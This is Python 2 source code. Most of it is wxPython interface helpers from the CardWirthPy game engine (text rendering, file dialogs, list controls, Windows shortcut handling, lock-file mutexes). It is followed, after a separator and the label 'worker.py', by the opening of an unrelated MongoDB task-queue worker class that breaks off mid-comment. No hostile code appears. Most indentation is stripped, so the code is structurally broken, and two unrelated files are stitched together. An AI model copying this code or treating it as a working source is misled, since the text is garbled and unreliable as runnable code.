colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DSHADOW)
dc.SetPen(wx.Pen(colour, 1, wx.SOLID))
box = get_boxpointlist(pos, size)
dc.DrawLineList(box)
def draw_witharound_simple(dc, s, x, y, aroundcolor):
"""テキストsを縁取りしながら描画する。"""
oldcolor = dc.GetTextForeground()
dc.SetTextForeground(aroundcolor)
for xx in xrange(x-1, x+2):
for yy in xrange(y-1, y+2):
            if xx != x or yy != y:
dc.DrawText(s, xx, yy)
dc.SetTextForeground(oldcolor)
dc.DrawText(s, x, y)
def draw_witharound(dc, s, x, y, maxwidth=0):
"""テキストsを縁取りしながら描画する。
フォントのスムージングを行う。
"""
draw_antialiasedtext(dc, s, x, y, False, maxwidth, 0, scaledown=False, bordering=True)
def draw_antialiasedtext(dc, text, x, y, white, maxwidth, padding,
quality=None, scaledown=True, alpha=64,
bordering=False):
if cw.cwpy.setting.bordering_cardname and bordering:
subimg = cw.util.render_antialiasedtext(dc, text, not white, maxwidth, padding,
scaledown=scaledown, quality=quality, alpha=alpha)
for xx in xrange(x-1, x+2):
for yy in xrange(y-1, y+2):
                if xx != x or yy != y:
dc.DrawBitmap(subimg, xx, yy)
subimg = cw.util.render_antialiasedtext(dc, text, white, maxwidth, padding,
scaledown=scaledown, quality=quality)
dc.DrawBitmap(subimg, x, y)
def render_antialiasedtext(basedc, text, white, maxwidth, padding,
quality=None, scaledown=True, alpha=255):
"""スムージングが施された、背景が透明なテキストを描画して返す。"""
if quality is None:
if 3 <= wx.VERSION[0]:
quality = wx.IMAGE_QUALITY_BICUBIC
else:
quality = wx.IMAGE_QUALITY_NORMAL
w, h = basedc.GetTextExtent(text)
font = basedc.GetFont()
upfont = 0 < maxwidth and maxwidth < w and not scaledown
if upfont:
scaledown = True
basefont = font
pixelsize = font.GetPixelSize()[1]
family = font.GetFamily()
style = font.GetStyle()
weight = font.GetWeight()
underline = font.GetUnderlined()
facename = font.GetFaceName()
encoding = font.GetEncoding()
    font = wx.FontFromPixelSize((0, pixelsize*2), family, style, weight, underline, facename, encoding)
basedc.SetFont(font)
w, h = basedc.GetTextExtent(text)
subimg = wx.EmptyBitmap(w, h)
dc = wx.MemoryDC(subimg)
dc.SetFont(font)
dc.SetBrush(wx.BLACK_BRUSH)
dc.SetPen(wx.BLACK_PEN)
dc.DrawRectangle(-1, -1, w + 2, h + 2)
dc.SetTextForeground(wx.WHITE)
dc.DrawText(text, 0, 0)
subimg = subimg.ConvertToImage()
if white:
subimg.ConvertColourToAlpha(255, 255, 255)
else:
subimg.ConvertColourToAlpha(0, 0, 0)
dc.SelectObject(wx.NullBitmap)
if scaledown:
if 0 < maxwidth and w/2 + padding*2 > maxwidth:
size = (maxwidth - padding*2, h/2)
subimg = subimg.Rescale(size[0], h/2, quality=quality)
else:
subimg = subimg.Rescale(w/2, h/2, quality=quality)
else:
if 0 < maxwidth and w + padding*2 > maxwidth:
size = (maxwidth - padding*2, h)
subimg = subimg.Rescale(size[0], h, quality=quality)
    if alpha != 255:
cw.imageretouch.mul_wxalpha(subimg, alpha)
if upfont:
        font = wx.FontFromPixelSize((0, pixelsize), family, style, weight, underline, facename, encoding)
basedc.SetFont(font)
subimg = subimg.ConvertToBitmap()
return subimg
def get_boxpointlist(pos, size):
"""StaticBoxの囲い描画用のposlistを返す。"""
x, y = pos
width, height = size
    poslist = []
poslist.append((x, y, x + width, y))
poslist.append((x, y, x, y + height))
poslist.append((x + width, y, x + width, y + height))
poslist.append((x, y + height, x + width, y + height))
return poslist
def create_fileselection(parent, target, message, wildcard="*.*", seldir=False, getbasedir=None, callback=None,
winsize=False, multiple=False):
"""ファイルまたはディレクトリを選択する
ダイアログを表示するボタンを生成する。
parent: ボタンの親パネル。
target: 選択結果を格納するコントロール。
message: 選択時に表示されるメッセージ。
wildcard: 選択対象の定義。
seldir: Trueの場合はディレクトリの選択を行う。
getbasedir: 相対パスを扱う場合は基準となるパスを返す関数。
"""
def OnOpen(event):
if target is None:
fpath = ""
else:
fpath = target.GetValue()
dpath = fpath
if getbasedir and not os.path.isabs(dpath):
dpath = os.path.join(getbasedir(), dpath)
if seldir:
dlg = wx.DirDialog(parent.TopLevelParent, message, dpath, wx.DD_DIR_MUST_EXIST)
if dlg.ShowModal() == wx.ID_OK:
dpath = dlg.GetPath()
if getbasedir:
base = getbasedir()
dpath2 = cw.util.relpath(dpath, base)
if not dpath2.startswith(".." + os.path.sep):
dpath = dpath2
if target is not None:
target.SetValue(dpath)
if callback:
callback(dpath)
dlg.Destroy()
else:
dpath = os.path.dirname(fpath)
fpath = os.path.basename(fpath)
flags = wx.FD_OPEN
if multiple:
flags |= wx.FD_MULTIPLE
dlg = wx.FileDialog(parent.TopLevelParent, message, dpath, fpath, wildcard, flags)
if dlg.ShowModal() == wx.ID_OK:
files = dlg.GetFilenames()
seq = []
fnames = ""
for fname in files:
fpath = os.path.join(dlg.GetDirectory(), fname)
if getbasedir:
base = getbasedir()
fpath2 = cw.util.relpath(fpath, base)
if not fpath2.startswith(".." + os.path.sep):
fpath = fpath2
if target is not None:
if fnames != "":
fnames += "; "
fnames += fpath
seq.append(fpath)
if callback:
callback(seq if multiple else seq[0])
if target is not None:
target.SetValue(fnames)
dlg.Destroy()
if winsize:
size = (cw.wins(20), -1)
else:
size = (cw.ppis(20), -1)
button = wx.Button(parent, size=size, label=u"...")
parent.Bind(wx.EVT_BUTTON, OnOpen, button)
return button
def adjust_position(frame):
"""frameの位置がいずれかのモニタ内に収まるように調節する。
サイズ変更は行わない。
"""
win = wx.Display.GetFromWindow(frame)
if win == wx.NOT_FOUND: win = 0
cax, cay, caw, cah = wx.Display(win).GetClientArea()
caw += cax
cah += cay
x, y, w, h = frame.GetRect()
if caw <= x + w: x = caw - w
if cah <= y + h: y = cah - h
if x < cax: x = cax
if y < cay: y = cay
frame.SetPosition((x, y))
class CWPyStaticBitmap(wx.Panel):
"""wx.StaticBitmapはアルファチャンネル付きの画像を
正しく表示できない場合があるので代替する。
複数重ねての表示にも対応。
"""
def __init__(self, parent, cid, bmps, bmps_bmpdepthkey, size=None, infos=None, ss=None):
if not size and bmps:
w = 0
h = 0
for bmp in bmps:
s = bmp.GetSize()
w = max(w, s[0])
h = max(h, s[1])
size = (w, h)
wx.Panel.__init__(self, parent, cid, size=size)
self.bmps = bmps
self.bmps_bmpdepthkey = bmps_bmpdepthkey
self.infos = infos
self.ss = ss
self._bind()
def _bind(self):
self.Bind(wx.EVT_PAINT, self.OnPaint)
def OnPaint(self, event):
dc = wx.PaintDC(self)
for i, (bmp, bmpdepthkey) in enumerate(zip(self.bmps, self.bmps_bmpdepthkey)):
if self.infos:
info = self.infos[i]
w, h = bmpdepthkey.GetSize()
scr_scale = bmpdepthkey.scr_scale if hasattr(bmpdepthkey, "scr_scale") else 1
w /= scr_scale
h /= scr_scale
baserect = info.calc_basecardposition_wx((w, h), noscale=True,
basecardtype="LargeCard",
cardpostype="NotCard")
baserect = self.ss(baserect)
x, y = baserect.x, baserect.y
else:
x, y = 0, 0
cw.imageretouch.wxblit_2bitbmp_to_card(dc, bmp, x, y, True, bitsizekey=bmpdepthkey)
def SetBitmap(self, bmps, bmps_bmpdepthkey, infos=None):
self.bmps = bmps
self.bmps_bmpdepthkey = bmps_bmpdepthkey
self.infos = infos
self.Refresh()
def GetBitmap(self, bmps):
return self.bmps
def abbr_longstr(dc, text, w):
"""ClientDCを使って長い文字列を省略して末尾に三点リーダを付ける。
dc: ClientDC
text: 編集対象の文字列
w: 目標文字列長(pixel)
"""
if w <= 0 and text:
if dc.GetTextExtent(text)[0] <= dc.GetTextExtent(u"...")[0]:
return text
else:
return u"..."
width = dc.GetTextExtent(text)[0]
if width > w:
while text and dc.GetTextExtent(text + u"...")[0] > w:
text = text[:-1]
text += u"..."
return text
class CheckableListCtrl(wx.ListCtrl,
wx.lib.mixins.listctrl.CheckListCtrlMixin,
wx.lib.mixins.listctrl.ListCtrlAutoWidthMixin):
"""チェックボックス付きのリスト。"""
def __init__(self, parent, cid, size, style, colpos=0, system=True):
wx.ListCtrl.__init__(self, parent, cid, size=size, style=style|wx.LC_NO_HEADER)
wx.lib.mixins.listctrl.CheckListCtrlMixin.__init__(self)
wx.lib.mixins.listctrl.ListCtrlAutoWidthMixin.__init__(self)
for i in xrange(colpos+1):
self.InsertColumn(i, u"")
self.InsertImageStringItem(0, u"", 0)
rect = self.GetItemRect(0, wx.LIST_RECT_LABEL)
self.SetColumnWidth(0, rect.x)
self.DeleteAllItems()
self.resizeLastColumn(0)
self.imglist = self.GetImageList(wx.IMAGE_LIST_SMALL)
assert self.imglist.ImageCount == 2
if not system:
w, h = cw.cwpy.rsrc.debugs_noscale["NOCHECK"].GetSize()
w, h = cw.wins((w, h))
            # CheckableList fakes its checkboxes by putting checkbox images at
            # indexes 0 and 1 of the ImageList.
            # So when the other icons' size does not match the checkbox
            # images, they must be swapped for our own icons.
w2, h2 = self.imglist.GetSize(0)
            if (w, h) != (w2, h2):
self.imglist = wx.ImageList(w, h, True)
self.imglist.Add(cw.wins(cw.cwpy.rsrc.debugs_noscale["NOCHECK"]))
self.imglist.Add(cw.wins(cw.cwpy.rsrc.debugs_noscale["CHECK"]))
self.SetImageList(self.imglist, wx.IMAGE_LIST_SMALL)
self._system = system
self._checking = False
self.OnCheckItem = self.DefaultOnCheckItem
def DefaultOnCheckItem(self, index, flag):
        # Play a sound on check; if the checked item was selected,
        # propagate the check to the other selected items as well
if self._checking:
return
self._checking = True
if not self._system:
cw.cwpy.play_sound("page")
wx.lib.mixins.listctrl.CheckListCtrlMixin.OnCheckItem(self, index, flag)
i = self.GetNextItem(index-1, wx.LIST_NEXT_ALL, wx.LIST_STATE_SELECTED)
if index == i:
index = -1
while True:
index = self.GetNextItem(index, wx.LIST_NEXT_ALL, wx.LIST_STATE_SELECTED)
if index < 0:
break
            if index != i:
self.CheckItem(index, flag)
self._checking = False
def Draw(self, index, dc, x, y, flags=wx.IMAGELIST_DRAW_NORMAL, solidBackground=False):
print(index, x, y)
wx.lib.mixins.listctrl.CheckListCtrlMixin.Draw(self, index, dc, x, y, flags, solidBackground)
class CWBackCheckBox(wx.CheckBox):
def __init__(self, parent, id, text):
"""CAUTIONリソースを背景とするチェックボックス。"""
wx.CheckBox.__init__(self, parent, id, text)
self.SetBackgroundStyle(wx.BG_STYLE_CUSTOM)
dc = wx.ClientDC(self)
dc.SetFont(cw.cwpy.rsrc.get_wxfont("paneltitle", pixelsize=cw.wins(15)))
w, h = dc.GetTextExtent(text)
bmp = cw.wins(cw.cwpy.rsrc.debugs_noscale["NOCHECK"])
w += cw.wins(4) + bmp.GetWidth()
h = max(h, bmp.GetHeight())
self.SetMinSize((w, h))
self.SetSize((w, h))
self._nocheck = bmp
self._check = cw.wins(cw.cwpy.rsrc.debugs_noscale["CHECK"])
self.background = cw.cwpy.rsrc.dialogs["CAUTION"]
self._bind()
def _bind(self):
self.Bind(wx.EVT_PAINT, self.OnPaint)
def set_background(self, bmp):
self.background = bmp
self.Refresh()
def OnPaint(self, event):
size = self.GetSize()
basebmp = wx.EmptyBitmap(size[0], size[1])
dc = wx.MemoryDC(basebmp)
# background
bmp = self.background
csize = self.GetClientSize()
fill_bitmap(dc, bmp, csize, ctrlpos=self.GetPosition())
# checkbox
if self.GetValue():
bmp = self._check
else:
bmp = self._nocheck
dc.DrawBitmap(bmp, cw.wins(2), (csize[1]-bmp.GetHeight()) / 2, True)
# text
dc.SetTextForeground(wx.BLACK)
s = self.GetLabel()
        # TODO: PyLite: harmonize the design of the "centering" option
if s == cw.cwpy.msgs["centering_face"]:
dc.SetFont(cw.cwpy.rsrc.get_wxfont("characre", pixelsize=cw.wins(12)))
else:
dc.SetFont(cw.cwpy.rsrc.get_wxfont("paneltitle", pixelsize=cw.wins(15)))
tsize = dc.GetTextExtent(s)
dc.DrawText(s, bmp.GetWidth()+cw.wins(4), (csize[1]-tsize[1]) / 2)
dc.SelectObject(wx.NullBitmap)
dc = wx.PaintDC(self)
dc.DrawBitmap(basebmp, 0, 0)
def add_sideclickhandlers(toppanel, leftbtn, rightbtn):
"""toppanelの左右の領域をクリックすると
leftbtnまたはrightbtnのイベントが実行されるように
イベントへのバインドを行う。
"""
def _is_cursorinleft():
rect = toppanel.GetClientRect()
x, _y = toppanel.ScreenToClient(wx.GetMousePosition())
return x < rect.x + rect.width / 4 and leftbtn.IsEnabled()
def _is_cursorinright():
rect = toppanel.GetClientRect()
x, _y = toppanel.ScreenToClient(wx.GetMousePosition())
return rect.x + rect.width / 4 * 3 < x and rightbtn.IsEnabled()
def _update_mousepos():
if _is_cursorinleft():
toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_BACK"])
elif _is_cursorinright():
toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_FORE"])
else:
toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_ARROW"])
def OnMotion(evt):
_update_mousepos()
def OnLeftUp(evt):
if _is_cursorinleft():
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, leftbtn.GetId())
leftbtn.ProcessEvent(btnevent)
elif _is_cursorinright():
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, rightbtn.GetId())
rightbtn.ProcessEvent(btnevent)
_update_mousepos()
toppanel.Bind(wx.EVT_MOTION, OnMotion)
toppanel.Bind(wx.EVT_LEFT_UP, OnLeftUp)
def set_acceleratortable(panel, seq, ignoreleftrightkeys=(wx.TextCtrl, wx.Dialog, wx.Panel)):
"""panelにseqから生成したAcceleratorTableを設定する。
"""
# テキスト入力欄に限り左右キーとBACKキーを取り除く
seq2 = []
for accel in seq:
        if not (accel[0] == wx.ACCEL_NORMAL and accel[1] in (wx.WXK_LEFT, wx.WXK_RIGHT, wx.WXK_BACK, ord('_'))):
seq2.append(accel)
accel1 = wx.AcceleratorTable(seq)
accel2 = wx.AcceleratorTable(seq2)
def recurse(widget):
if isinstance(widget, ignoreleftrightkeys):
widget.SetAcceleratorTable(accel2)
else:
widget.SetAcceleratorTable(accel1)
for child in widget.GetChildren():
recurse(child)
recurse(panel)
def adjust_dropdownwidth(choice):
"""wx.Choiceまたはwx.ComboBoxのドロップダウンリストの
横幅を内容に合わせて広げる。
"""
if sys.platform == "win32":
        # scrollbar width
scwidth = win32api.GetSystemMetrics(win32con.SM_CXVSCROLL)
w = win32api.SendMessage(choice.GetHandle(), win32con.CB_GETDROPPEDWIDTH, 0, 0)
        # measure the width of each item (the font must be set before measuring)
        dc = wx.ClientDC(choice)
        dc.SetFont(choice.GetFont())
        for s in choice.GetItems():
            w = max(w, dc.GetTextExtent(s)[0] + cw.ppis(5) + scwidth)
        # never wider than the monitor
d = wx.Display.GetFromWindow(choice)
if d == wx.NOT_FOUND: d = 0
drect = wx.Display(d).GetClientArea()
w = min(w, drect[2])
        # apply the width
win32api.SendMessage(choice.GetHandle(), win32con.CB_SETDROPPEDWIDTH, w, 0)
def has_modalchild(frame):
"""frame.TopLevelParentにモーダル表示中のサブウィンドウがあればTrue。"""
for child in frame.TopLevelParent.GetChildren():
if isinstance(child, wx.Dialog) and child.IsShown() and child.IsModal():
return True
if frame is cw.cwpy.frame and cw.cwpy.frame.debugger and has_modalchild(cw.cwpy.frame.debugger):
return True
return False
class CWPyRichTextCtrl(wx.richtext.RichTextCtrl):
_search_engines = None
def __init__(self, parent, id, text="", size=(-1, -1), style=0, searchmenu=False):
wx.richtext.RichTextCtrl.__init__(self, parent, id, text, size=size, style=style)
# popup menu
self.popup_menu = wx.Menu()
self.mi_copy = wx.MenuItem(self.popup_menu, wx.ID_COPY, u"コピー(&C)")
self.mi_selectall = wx.MenuItem(self.popup_menu, wx.ID_SELECTALL, u"すべて選択(&A)")
self.popup_menu.AppendItem(self.mi_copy)
self.popup_menu.AppendItem(self.mi_selectall)
self.Bind(wx.EVT_TEXT_URL, self.OnURL)
self.Bind(wx.EVT_CONTEXT_MENU, self.OnContextMenu)
self.Bind(wx.EVT_MOUSEWHEEL, self.OnMouseWheel)
self.Bind(wx.EVT_MOTION, self.OnMotion)
self.Bind(wx.EVT_MENU, self.OnCopy, id=wx.ID_COPY)
self.Bind(wx.EVT_MENU, self.OnSelectAll, id=wx.ID_SELECTALL)
self.search_engines = []
if searchmenu:
if os.path.isfile(u"Data/SearchEngines.xml"):
try:
if CWPyRichTextCtrl._search_engines is None:
CWPyRichTextCtrl._search_engines = []
data = cw.data.xml2element(u"Data/SearchEngines.xml")
for e in data:
if e.tag == u"SearchEngine":
url = e.getattr(".", "url", "")
name = e.text
if url and name:
menuid = wx.NewId()
CWPyRichTextCtrl._search_engines.append((url, name, menuid))
class SearchEngine(object):
def __init__(self, parent, url, name, menuid):
self.parent = parent
self.url = url
self.mi = wx.MenuItem(self.parent.popup_menu, menuid, name)
self.parent.popup_menu.AppendItem(self.mi)
self.parent.Bind(wx.EVT_MENU, self.OnSearch, id=menuid)
def OnSearch(self, event):
try:
self.parent.go_url(self.url % self.parent.GetStringSelection())
except:
cw.util.print_ex(file=sys.stderr)
separator = False
for url, name, menuid in CWPyRichTextCtrl._search_engines:
if not separator:
separator = True
self.popup_menu.AppendSeparator()
self.search_engines.append(SearchEngine(self, url, name, menuid))
except:
cw.util.print_ex(file=sys.stderr)
def set_text(self, value, linkurl=False):
        # If the ZIP archive's file encoding differs from the encoding of
        # the text file being read, an error occurs, hence this fallback.
        try:
            # write test. FIXME: a smarter way that does not rely on writing
self.WriteText(value)
value2 = value
except Exception:
value2 = cw.util.decode_text(value)
        # FIXME: if the caret sits on a URL (after a URL click etc.) when the
        # text is deleted, the URL link style is applied to all text added
        # afterwards.
        # So, assuming the text does not end in a URL, move the caret to the
        # end of the text before clearing.
self.MoveEnd()
self.Clear()
        # find the URLs and split the text into a list
        def get_urls(text):
            prog = re.compile(r"http(s)?://([\w\-]+\.)+[\w]+(/[\w\-./?%&=~#!]*)?")
            parts = []
            url = prog.search(text)
            while url:
                if url.start() > 0:
                    parts.append((text[:url.start()], False))
                parts.append((url.group(0), True))
                text = text[url.end():]
                url = prog.search(text)
            if len(text) > 0:
                parts.append((text, False))
            return parts
if linkurl:
for v, url_flag in get_urls(value2):
if url_flag:
self.BeginTextColour((255, 132, 0))
self.BeginUnderline()
self.BeginURL(v)
else:
self.BeginTextColour(wx.WHITE)
self.WriteText(v)
if url_flag:
self.EndURL()
self.EndUnderline()
self.EndTextColour()
self.EndTextColour()
if len(self.GetValue()) and not self.GetValue()[-1] in ("\n", "\r"):
            # append a newline when the text does not end with one;
            # this also works around the all-text-becomes-URL bug noted above
self.WriteText("\n")
self.ShowPosition(0)
def OnMouseWheel(self, event):
if has_modalchild(self):
return
y = self.GetScrollPos(wx.VERTICAL)
if sys.platform == "win32":
import win32gui
            SPI_GETWHEELSCROLLLINES = 104  # lines to scroll per wheel notch
            value = win32gui.SystemParametersInfo(SPI_GETWHEELSCROLLLINES)
line_height = self.GetFont().GetPixelSize()[1]
value *= line_height
value /= self.GetScrollPixelsPerUnit()[1]
else:
value = cw.wins(4)
if get_wheelrotation(event) > 0:
self.Scroll(0, y - value)
else:
self.Scroll(0, y + value)
self.Refresh()
def OnMotion(self, event):
        # scrolling for drags outside the view; is the branch on mouse input really unnecessary?
mousey = event.GetPosition()[1]
y = self.GetScrollPos(wx.VERTICAL)
if mousey < cw.wins(0):
self.Scroll(0, y - cw.wins(4))
self.Refresh()
elif mousey > self.GetSize()[1]:
self.Scroll(0, y + cw.wins(4))
self.Refresh()
event.Skip()
def OnContextMenu(self, event):
self.mi_copy.Enable(self.HasSelection())
for searchengine in self.search_engines:
searchengine.mi.Enable(self.HasSelection())
self.PopupMenu(self.popup_menu)
def OnCopy(self, event):
self.Copy()
def OnSelectAll(self, event):
self.SelectAll()
def go_url(self, url):
try:
webbrowser.open(url)
except:
s = u"「%s」が開けませんでした。インターネットブラウザが正常に関連付けされているか確認して下さい。" % url
dlg = cw.dialog.message.ErrorMessage(self, s)
cw.cwpy.frame.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
def OnURL(self, event):
        # do not launch the browser while text is selected
if not self.HasSelection():
self.go_url(event.GetString())
def get_wheelrotation(event):
"""マウスのホイールを横に倒した場合に
取得できる回転量の値は直感と逆転しているので
この関数をラッパとして反転した値を取得する。
"""
if 3 <= wx.VERSION[0] and event.GetWheelAxis() == wx.MOUSE_WHEEL_HORIZONTAL:
return -event.GetWheelRotation()
else:
return event.GetWheelRotation()
class CWTabArt(wx.lib.agw.aui.tabart.AuiDefaultTabArt):
"""wx.lib.agw.aui.tabart.AuiDefaultTabArtと同じように
wx.lib.agw.aui.AuiNotebookのタブを描画するが、
テキストのみ左寄せから中央寄せに変更する。
"""
def DrawTab(self, dc, wnd, page, in_rect, close_button_state, paint_control=False):
        # temporarily blank the caption so that only the background is drawn
caption = page.caption
page.caption = u""
r = super(CWTabArt, self).DrawTab(dc, wnd, page, in_rect, close_button_state, paint_control)
page.caption = caption
        # draw the caption
te = dc.GetTextExtent(page.caption)
rect = r[0]
dc.DrawText(page.caption, rect.X + (rect.Width - te[0]) / 2, in_rect.Y + (in_rect.Height - te[1]) / 2)
return r
#-------------------------------------------------------------------------------
# Threading
#-------------------------------------------------------------------------------
"""
@synclock(_lock)
def function():
...
のように、ロックオブジェクトを指定して
特定関数・メソッドの排他制御を行う。
"""
def synclock(l):
def synclock(f):
def acquire(*args, **kw):
l.acquire()
try:
return f(*args, **kw)
finally:
l.release()
return acquire
return synclock
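# Example (illustrative only; the names below are hypothetical):
#   _counter_lock = threading.Lock()
#   @synclock(_counter_lock)
#   def increment(counter):
#       counter["n"] = counter.get("n", 0) + 1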
#-------------------------------------------------------------------------------
# Shortcuts
#-------------------------------------------------------------------------------
# set of threads that have already called CoInitialize()
_cominit_table = set()
def _co_initialize():
"""スレッドごとにCoInitialize()を呼び出す。"""
global _cominit_table
if sys.platform <> "win32":
return
thr = threading.currentThread()
if thr in _cominit_table:
        return  # already called
pythoncom.CoInitialize()
_cominit_table.add(thr)
    # remove any threads that have already finished
for thr2 in _cominit_table.copy():
if not thr2.isAlive():
_cominit_table.remove(thr2)
def get_linktarget(fpath):
"""fileがショートカットだった場合はリンク先を、
そうでない場合はfileを返す。
"""
if sys.platform <> "win32" or not fpath.lower().endswith(".lnk") or not os.path.isfile(fpath):
return fpath
_co_initialize()
shortcut = pythoncom.CoCreateInstance(win32shell.CLSID_ShellLink, None,
pythoncom.CLSCTX_INPROC_SERVER,
win32shell.IID_IShellLink)
try:
encoding = sys.getfilesystemencoding()
STGM_READ = 0x00000000
shortcut.QueryInterface(pythoncom.IID_IPersistFile).Load(fpath.encode(encoding), STGM_READ)
fpath = shortcut.GetPath(win32shell.SLGP_UNCPRIORITY)[0].decode(encoding)
except Exception:
print_ex()
return fpath
return get_linktarget(join_paths(fpath))
def create_link(shortcutpath, targetpath):
"""targetpathへのショートカットを
shortcutpathに作成する。
"""
if sys.platform <> "win32":
return
dpath = os.path.dirname(shortcutpath)
if not os.path.exists(dpath):
os.makedirs(dpath)
_co_initialize()
targetpath = os.path.abspath(targetpath)
shortcut = pythoncom.CoCreateInstance(win32shell.CLSID_ShellLink, None,
pythoncom.CLSCTX_INPROC_SERVER,
win32shell.IID_IShellLink)
encoding = sys.getfilesystemencoding()
shortcut.SetPath(targetpath.encode(encoding))
shortcut.QueryInterface(pythoncom.IID_IPersistFile).Save(shortcutpath.encode(encoding), 0)
#-------------------------------------------------------------------------------
# Performance counters
#-------------------------------------------------------------------------------
dictimes = {}
times = [0.0] * 1024
timer = 0.0
def t_start():
global timer
timer = time.time()
def t_end(index):
global times, timer
times[index] += time.time() - timer
timer = time.time()
def td_end(key):
global dictimes, timer
if key in dictimes:
dictimes[key] += time.time() - timer
else:
dictimes[key] = time.time() - timer
timer = time.time()
def t_reset():
global times, dictimes
    times = [0.0] * len(times)
dictimes.clear()
def t_print():
global times, dictimes
lines = []
for i, t in enumerate(times):
if 0 < t:
s = u"time[%s] = %s" % (i, t)
lines.append(s)
print s
for key, t in dictimes.iteritems():
if 0 < t:
s = u"time[%s] = %s" % (key, t)
lines.append(s)
print s
if lines:
with open("performance.txt", "w") as f:
f.write(u"\n".join(lines))
f.flush()
f.close()
#-------------------------------------------------------------------------------
# Concurrent launch control
#-------------------------------------------------------------------------------
_lock_mutex = threading.Lock()
_mutex = []
if sys.platform <> "win32":
import fcntl
@synclock(_lock_mutex)
def create_mutex(dpath):
global _mutex
if not os.path.isabs(dpath):
dpath = os.path.abspath(dpath)
dpath = os.path.normpath(dpath)
dpath = os.path.normcase(dpath)
name = os.path.join(dpath, u".CardWirthPy.lock")
    # prevent double launch, for Windows
if sys.platform == "win32":
        # BUG: with win32file.LockFileEx() and win32file.UnlockFileEx(),
        # unlocking mysteriously fails after leaving this function
kernel32 = ctypes.windll.kernel32
class OVERLAPPED(ctypes.Structure):
_fields_ = [
('Internal', ctypes.wintypes.DWORD),
('InternalHigh', ctypes.wintypes.DWORD),
('Offset', ctypes.wintypes.DWORD),
('OffsetHigh', ctypes.wintypes.DWORD),
('hEvent', ctypes.wintypes.HANDLE),
]
f = open(name, "w")
handle = msvcrt.get_osfhandle(f.fileno())
if kernel32.LockFileEx(handle,
win32con.LOCKFILE_FAIL_IMMEDIATELY|win32con.LOCKFILE_EXCLUSIVE_LOCK,
0, 0, 0xffff0000, ctypes.byref(OVERLAPPED())):
class Unlock(object):
def __init__(self, name, f):
self.name = name
self.f = f
def unlock(self):
if self.f:
handle = msvcrt.get_osfhandle(self.f.fileno())
kernel32.UnlockFileEx(handle, 0, 0, 0xffff0000, ctypes.byref(OVERLAPPED()))
self.f = None
remove(self.name)
_mutex.append((Unlock(name, f), name))
return True
else:
return False
else:
# Posix
try:
if not os.path.isfile(name):
dpath = os.path.dirname(name)
if not os.path.isdir(dpath):
os.makedirs(dpath)
f = open(name, "wb")
fcntl.flock(f.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
_mutex.append((f, name))
return True
except IOError:
return False
return False
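# Usage sketch (illustrative only; the directory name is hypothetical):
#   if not create_mutex(yadodir):
#       sys.exit(u"another instance is already running")
#   try:
#       ...
#   finally:
#       release_mutex()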
@synclock(_lock_mutex)
def exists_mutex(dpath):
global _mutex
if not os.path.isabs(dpath):
dpath = os.path.abspath(dpath)
dpath = os.path.normpath(dpath)
dpath = os.path.normcase(dpath)
name = os.path.join(dpath, u".CardWirthPy.lock")
if name in map(lambda m: m[1], _mutex):
return False
if sys.platform == "win32":
try:
if not os.path.isfile(name):
return False
with open(name, "w") as f:
pass
remove(name)
except:
return True
return False
else:
# Posix
try:
if not os.path.isfile(name):
dpath = os.path.dirname(name)
if not os.path.isdir(dpath):
os.makedirs(dpath)
with open(name, "wb") as f:
fcntl.flock(f.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
fcntl.flock(f.fileno(), fcntl.LOCK_UN)
remove(name)
return False
except IOError:
return True
@synclock(_lock_mutex)
def release_mutex(index=-1):
global _mutex
if _mutex:
if sys.platform == "win32":
_mutex[index][0].unlock()
else:
fcntl.flock(_mutex[index][0].fileno(), fcntl.LOCK_UN)
_mutex[index][0].close()
remove(_mutex[index][1])
_mutex.pop(index)
@synclock(_lock_mutex)
def clear_mutex():
global _mutex
for mutex, name in _mutex:
if sys.platform == "win32":
mutex.unlock()
else:
f = mutex
fcntl.flock(f.fileno(), fcntl.LOCK_UN)
f.close()
remove(name)
_mutex = []
def main():
pass
if __name__ == "__main__":
main()
|
worker.py
|
from contextlib import contextmanager
from datetime import datetime
import getpass
import logging
from multiprocessing import Process
import os
import platform
import signal
import sys
import time
import random
from pymongo.errors import ConnectionFailure
from mtq.log import MongoStream, MongoHandler
from mtq.utils import handle_signals, now, setup_logging, nulltime
class Worker(object):
'''
    Workers should be created via MTQConnection.new_worker.
'''
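    # Usage sketch (illustrative only; assumes an MTQConnection instance
    # `conn`):
    #   worker = conn.new_worker(queues=['default'], tags=['gpu'])
    #   worker.work(batch=True)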
def __init__(self, factory, queues=(), tags=(), priority=0,
poll_interval=1, exception_handler=None,
log_worker_output=False, silence=False, extra_lognames=()):
self.name = '%s.%s' % (platform.node(), os.getpid())
self.extra_lognames = extra_lognames
self.queues = queues
self.tags = tags
self.priority = priority
self._log_worker_output = log_worker_output
self.factory = factory
self.poll_interval = poll_interval
self.logger = logging.getLogger('mq.Worker')
self._current = None
self._handler = exception_handler
self._pre_call = None
self._post_call = None
self.silence = silence
self.collection = self.factory.worker_collection
worker_id = '-'
@contextmanager
def register(self):
'''
Internal
Contextmanager, register the birth and death of this worker
eg::
with worker.register():
# Work
'''
self.collection = self.factory.worker_collection
self.worker_id = self.collection.insert({'name': self.name,
'host': platform.node(),
'system': platform.system(),
                                                 'pid': os.getpid(),
'user': getpass.getuser(),
'started':now(),
'finished':datetime.fromtimestamp(0),
'check-in':datetime.fromtimestamp(0),
'working':True,
'queues': self.queues,
'tags': self.tags,
'log_output': bool(self._log_worker_output),
'terminate': False,
'terminate_status': 0,
})
if self._log_worker_output:
hdlr = MongoHandler(self.factory.logging_collection, {'worker_id':self.worker_id})
self.logger.addHandler(hdlr)
try:
yield self.worker_id
finally:
if self._log_worker_output:
self.logger.removeHandler(hdlr)
query = {'_id': self.worker_id}
update = {'$set':{'finished':now(), 'working':False}}
self.collection.update(query, update)
def check_in(self):
query = {'_id': self.worker_id}
update = {'$set':{'check-in':now(), 'working':True}}
worker_info = self.collection.find_and_modify(query, update)
if worker_info:
should_exit = worker_info.get('terminate', False)
status = worker_info.get('terminate_status', 0)
return should_exit, status
return False, 0
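    # A shutdown can be requested from outside this process (illustrative
    # note) by setting the flags that check_in() reads on this worker's
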